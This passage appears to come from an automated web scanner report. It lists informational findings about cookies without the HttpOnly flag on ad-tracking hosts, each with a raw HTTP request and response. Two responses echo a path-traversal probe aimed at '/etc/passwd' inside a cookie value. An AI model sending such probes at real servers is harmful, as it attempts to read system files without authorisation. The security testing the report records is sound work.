Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:22 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

12.33. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035630&c3=&c4=&c5=&c6=&c15=&ns__t=1315097328739&ns_c=UTF-8&c8=Notre%20Dame%2C%20Michigan%20stadiums%20cleared%20due%20to%20storms%20%7C%20Reuters&c7=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&c9=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.34. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:52:26 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.35. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=189535721&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:06:36 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.36. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: V and pb_rtb_ev. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=2925993182975414771 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app603
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:56:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.37. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: CMID, CMPS, CMPP, CMS, CMST and CMD1. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615
...[SNIP]...

12.38. http://ce.lijit.com/merge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ljtrtb. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=2925993182975414771 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n48), ms lax-agg-n48 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Mon, 05 Sep 2011 00:58:08 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

12.39. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UserData. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

12.40. http://community.sprint.com/baw/community/buzzaboutwireless

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 186
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=346147 t=1315099124916508
Connection: close
Content-Length: 138024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:54 GMT
Server: Apache-Coyote/1.1
X-JAL: 270
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=424084 t=1315099134687160
Connection: close
Content-Length: 156782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.42. http://community.sprint.com/baw/community/sprintblogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 95
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=222160 t=1315099125905413
Connection: close
Content-Length: 115606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.43. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.44. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.45. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.46. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.47. http://i.casalemedia.com/imp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /imp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp.gif?c=89733&cr=235451 HTTP/1.1
Host: i.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=102679&1315097055; CMST=TmLJ305iyd8B; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT

GIF89a.............!.......,...........D..;

12.48. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

